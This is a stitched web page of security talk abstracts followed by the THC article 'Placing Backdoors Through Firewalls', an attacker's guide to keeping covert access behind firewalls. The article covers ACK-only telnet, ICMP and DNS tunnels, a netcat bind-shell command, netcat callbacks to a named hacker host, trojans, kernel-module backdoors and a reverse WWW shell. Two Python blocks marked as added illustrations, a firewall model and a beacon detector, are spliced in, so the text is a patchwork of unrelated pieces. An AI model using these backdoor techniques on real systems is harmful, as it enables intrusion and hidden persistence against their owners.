This document describes potential backdoor techniques to maintain access to systems behind different types of firewalls. It discusses placing backdoors on internal machines rather than firewall machines. Suggested backdoor methods include using ACK-only telnet, the Loki ICMP tunnel, a UDP-based daemon shell, and exploiting ports left open for non-passive FTP. Insider assistance, exploiting vulnerable external services, hijacking connections, and trojan files are also proposed for initially penetrating firewalls.
Predicting and Abusing WPA2/802.11 Group Keys (vanhoefm)
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
[ENG] IPv6 shipworm + My little Windows domain pwnie (Zoltan Balazs)
Hacktivity 2011 presentation about IPv6 Teredo protocol, Windows pass-the-hash attack
Original video in Hungarian: http://vimeo.com/31359639
Translated version: http://vimeo.com/31360814
Agenda:
An in-depth review of various security mechanisms in the kernel, like those added by PaX and grsecurity.
Speaker:
Yehontan Biton, senior kernel developer and computer science researcher for Ben Gurion University of the Negev.
Automated Malware Analysis and Cyber Security Intelligence (Jason Choi)
This presentation is an introduction to Cuckoo Sandbox, an automated malware analysis system, and to the intelligence work done with this tool at the Department of Scientific Criminal Investigation, SungKyunKwan University, Korea.
Martin Čmelík
Security-Portal.cz, Securix.org
http://www.security-session.cz
Talk: Hardening Linux systems and introducing the Securix GNU/Linux distribution
The talk will cover ways of securing Linux systems from the lowest layer up to the application layer. It will present security improvements usable on all Linux distributions, up to MLS (Multi-Level Security) systems of the Grsec and PaX type, which can define in fine detail the permissions and resource access of every application.
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where you have deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic, meaning that they work against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
It is for new users who don't have much knowledge of IT security. Here I focus on the configuration basics of the Windows built-in firewall, Comodo, ZoneAlarm and Outpost Pro.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
This PPT covers the history, generations of firewalls, types, architectures, advantages and disadvantages.
A very basic PPT; it can be used for college and paper-presentation seminars.
1. Placing Backdoors Through Firewalls
---[ Placing Backdoors Through Firewalls ]---
v1.5
Author: van Hauser / THC
----[ Introduction
This article describes possible backdoors through different firewall architectures. However, the material can also be
applied to other environments to describe how hackers (you?) cover their access to a system.
Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this, the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.
As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.
----[ Firewall Architectures
There are two basic firewall architectures and each has an enhanced version.
Packet Filters:
This is a host or router which checks each packet against an allow/deny rule table before routing it through the correct interface. There are very simple ones which can only filter on the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some TCP or IP flags.
This could be a simple router, e.g. any Cisco, or a Linux machine with firewalling activated (ipfwadm).
Stateful Filters:
This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of state information such as TCP sequence numbers. Some pay attention to application protocols, which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (e.g. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.
file:///C|/Documents%20and%20Settings/mwood/Desktop/C...neypots/Placing%20Backdoors%20Through%20Firewalls.htm (1 of 7)8/1/2006 2:05:22 AM
Proxies / Circuit Level Gateways:
A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration
and/or just a sockd.
Application Gateways:
This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall, software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, e.g. that an outgoing ftp may only download data but not upload any, that the data has got no virus, that no buffer overflows are generated in answers, etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).
Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.
----[ Getting in
Before we talk about which backdoors are best for which firewall architecture, we should shed some light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies; this has to be carefully planned and done.
The four main possibilities:
Insider:
There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This
is the easiest way of course.
Vulnerable Services:
Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may
be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not
protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those
services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail
for mail relaying ...
Vulnerable External Server:
People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, or replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works; it crashes, yeah, but I didn't look into whether this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particularly true for the US, where academic environments and industry/military work closely together.
Hijacking Connections:
Many companies think that if they allow incoming telnet with some kind of secure authentication like
SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get
in ... Another way of using hijacked connections is to modify replies in the protocol implementation to
generate a buffer overflow (f.e. with X).
Trojans:
Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers with e.g. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone to run this, mail spoofing could be used, or replacing originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to get to know which files these are).
----[ Placing the Backdoors
An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks.
I will now talk about some ideas for backdoors which could be implemented. Note that programs which will/would run through a stateful filter will of course work with a normal packet filter too, and the same goes for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker
anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.
Packet Filters:
It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which come to mind are:
a) the ack-telnet. It works like a normal telnet/telnetd except it does not use the normal TCP handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too, to establish a tunnel with icmp echo/reply packets. But some coding would need to be done.
c) daemonshell-udp is a backdoor shell via UDP (http://www.thehackerschoice.com, look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.
Stateful Filters:
Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the datastream).
passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.
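As an added illustration (not part of the article), a toy Python model of the two filter types just discussed: a stateless rule table with the "ACK means established" and "source port 20 to a high port" allowances, beside a stateful filter that only admits inbound packets matching a flow the inside opened (and ftp-data only behind an open control session). Packets, addresses and the 10.0.0.0/8 internal range are constructed assumptions.

```python
from dataclasses import dataclass
from typing import Dict, Set, Tuple

# Toy model of a stateless screening router versus a stateful filter.
# Everything here is constructed for the illustration; the internal
# network is assumed to be 10.0.0.0/8.

@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False

def is_internal(ip: str) -> bool:
    return ip.startswith("10.")

def stateless_allow(p: Packet) -> bool:
    """Screening router: a per-packet rule table with no memory of flows."""
    if is_internal(p.src) and not is_internal(p.dst):
        return True                        # anything outbound is fine
    if p.ack and not p.syn:
        return True                        # ACK set: assumed reply to an existing session
    if p.sport == 20 and p.dport > 1023:
        return True                        # non-passive ftp-data into a high port
    return False                           # default deny

Flow = Tuple[str, int, str, int]           # (src, sport, dst, dport)

class StatefulFilter:
    """Stateful filter: inbound packets must belong to a flow the inside opened."""

    def __init__(self) -> None:
        self.flows: Set[Flow] = set()

    def allow(self, p: Packet) -> bool:
        if is_internal(p.src) and not is_internal(p.dst):
            if p.syn and not p.ack:
                self.flows.add((p.src, p.sport, p.dst, p.dport))  # remember the new session
            return True
        if (p.dst, p.dport, p.src, p.sport) in self.flows:
            return True                    # genuine reply to a tracked flow
        if p.sport == 20 and p.dport > 1023:
            # ftp-data is only opened for a host with a control session to that server
            return any(f[0] == p.dst and f[2] == p.src and f[3] == 21 for f in self.flows)
        return False

def scenario() -> Dict[str, Tuple[bool, bool]]:
    """Run the cases from the text through both filters: (stateless, stateful)."""
    inside, web, attacker = "10.1.1.5", "203.0.113.9", "198.51.100.7"
    sf = StatefulFilter()
    cases = [
        # legitimate browsing: outbound SYN, then the server's reply
        ("web request", Packet(inside, 40000, web, 80, syn=True)),
        ("web reply", Packet(web, 80, inside, 40000, ack=True)),
        # ftp control session, then the server's data connection from port 20
        ("ftp control", Packet(inside, 40001, web, 21, syn=True)),
        ("ftp data", Packet(web, 20, inside, 40002, syn=True)),
        # ack-telnet style packet: ACK only, no session behind it
        ("ack-only packet", Packet(attacker, 4444, inside, 23, ack=True)),
        # source port 20 to a high port with no ftp session behind it
        ("sport-20 to high port", Packet(attacker, 20, inside, 31337, syn=True)),
        # plain inbound SYN: both filters drop it
        ("inbound syn", Packet(attacker, 5555, inside, 23, syn=True)),
    ]
    return {name: (stateless_allow(p), sf.allow(p)) for name, p in cases}

if __name__ == "__main__":
    for name, (sl, st) in scenario().items():
        print(f"{name:24s} stateless={'pass' if sl else 'drop'}  stateful={'pass' if st else 'drop'}")
```

The two rows that differ (ACK-only and source-port-20) are exactly the packet-filter-only backdoors listed above; the state table, not the rule table, is what closes them.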
Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all the stuff for the stateful filter and "socksify" it (www.socks.nec.com). For more advanced tools you should take a look at the application gateway section.
Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent, so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/checked/audited and accessible from the internet. I hope nobody needs an example of such a thing ;-)
(re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even sniffed permanently ...
Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.
passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers to commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (-> Backdoor Example: The Reverse WWW Shell).
DNS - same concept as above but with dns queries and replies. The disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example still needs much coding to be effective)
----[ Backdoor Example: The Reverse WWW Shell
This backdoor should work through any firewall which has got the security policy to allow users to surf the
WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:
+--------+                          +------------+                  +-------------+
|internal|--------------------------|  FIREWALL  |------------------|server owned |
|  host  |     internal network     +------------+     internet     |by the hacker|
+--------+                                                          +-------------+
  SLAVE                                                                  MASTER
Well, a program is run on the internal host, which spawns a child every day at a special time. To the firewall, this child looks like a user using his netscape client to surf the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends its ready signal. The legitimate looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.
Example of a connection:
Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0
Master replies with
g5mAlfbknz
The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls"
command from the hacker on the external server (MASTER). Some gimmicks:
The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix it the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (e.g. squid) are supported; the program masks its name in the process listing ...
Best of all: master & slave program are just one 260-line perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time for the slave to try to connect.
Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.
The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got
updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at
root@localhost. Check out http://www.thehackerschoice.com for updates.
----[ The Source
Grab it here ...
rwwwshell v2.0
----[ Security
Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. Email should be put on a centralized mail server, DNS resolving only done on the WWW/FTP proxies, and access to the WWW only after proxy authentication.
However, this is not enough. An attacker can tamper with the mailreader to execute the commands extracted from the crypted X-Headers, or implement the http authentication into the reverse www-shell (it's simple). Also, checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or by using aliases.
A secure solution would be to set up a second network which is connected to the internet, and keep the real one separated - but tell that to the employees ... A good firewall is a big improvement, and an Intrusion Detection System can also help. But nothing can stop a dedicated attacker.
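A defender-side check for the pattern described in the Reverse WWW Shell section and for the log-checking advice in this section, as an added example (not the author's code and not part of rwwwshell): it parses constructed, simplified proxy log lines and flags a client/host pair when query values have the shape of the encoded cgi string (long, base64-like, high entropy) and when the client contacts the same host at nearly the same time of day on several days. The log format, thresholds and hosts are assumptions; the first query string is the sample GET from the text.

```python
import math
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterator, Set, Tuple
from urllib.parse import urlsplit

# Constructed, simplified proxy log lines: "<timestamp> <client> <method> <url>".
# The first query string is the sample GET from the text; the others are made up.
LOG = """\
2006-08-01T02:05:22 10.1.1.5 GET http://203.0.113.9/cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj
2006-08-01T09:12:00 10.1.1.7 GET http://www.example.com/index.html
2006-08-02T02:05:30 10.1.1.5 GET http://203.0.113.9/cgi-bin/order?Bx7Lq2ZmK9pTs4WvN1cR8yH3jF6dG0aQ5uE2oI7tXk
2006-08-02T10:40:11 10.1.1.7 GET http://www.example.com/news?page=2
2006-08-03T02:04:58 10.1.1.5 GET http://203.0.113.9/cgi-bin/order?Z3kP8wQ1vT6mL9sX2nB5hJ0cR4yU7dF1aE6gI3oWqC
2006-08-03T14:02:09 10.1.1.7 GET http://www.example.com/search?q=firewall+hardening
"""

B64ISH = re.compile(r"^[A-Za-z0-9+/=_-]+$")
MIN_LEN = 24          # query values shorter than this are not judged (assumed threshold)
MIN_ENTROPY = 4.0     # bits per character; natural-language values sit well below this
MIN_DAYS = 3          # distinct days needed before a pattern counts as "daily"
MAX_SPREAD_S = 300    # tolerated time-of-day spread (seconds) for a daily beacon

def shannon_entropy(s: str) -> float:
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_encoded(value: str) -> bool:
    """Long, base64-looking, high-entropy value: the shape of the encoded cgi string."""
    return (len(value) >= MIN_LEN and bool(B64ISH.match(value))
            and shannon_entropy(value) >= MIN_ENTROPY)

def parse(log: str) -> Iterator[Tuple[datetime, str, str, str]]:
    """Yield (timestamp, client, host, query) for each non-empty log line."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(" ", 3)
        parts = urlsplit(url)
        yield datetime.fromisoformat(ts), client, parts.netloc, parts.query

def analyze(log: str) -> Dict[Tuple[str, str], Set[str]]:
    """Return (client, host) pairs with the reasons they resemble a reverse WWW shell."""
    reasons: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    # per (client, host): first seen seconds-since-midnight on each day
    times: Dict[Tuple[str, str], Dict[str, int]] = defaultdict(dict)
    for ts, client, host, query in parse(log):
        key = (client, host)
        for kv in query.split("&"):
            if kv and looks_encoded(kv.split("=", 1)[-1]):
                reasons[key].add("high-entropy query")
        day = ts.date().isoformat()
        times[key].setdefault(day, ts.hour * 3600 + ts.minute * 60 + ts.second)
    for key, per_day in times.items():
        if len(per_day) >= MIN_DAYS:
            tod = per_day.values()
            # note: a beacon straddling midnight would need wrap-around handling
            if max(tod) - min(tod) <= MAX_SPREAD_S:
                reasons[key].add("daily beacon")
    return dict(reasons)

if __name__ == "__main__":
    for (client, host), why in analyze(LOG).items():
        print(f"{client} -> {host}: {', '.join(sorted(why))}")
```

The text's own caveat applies: a slave that rotates external servers every few calls defeats the per-host beacon check, so the query-shape check is kept independent of it.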
----[ Last Words
Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.
Ciao...
van Hauser / [THC] - The Hacker's Choice
For further interesting discussions you can email me at
vh@reptile.rug.ac.be with my public pgp key below:
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----
----[ THE END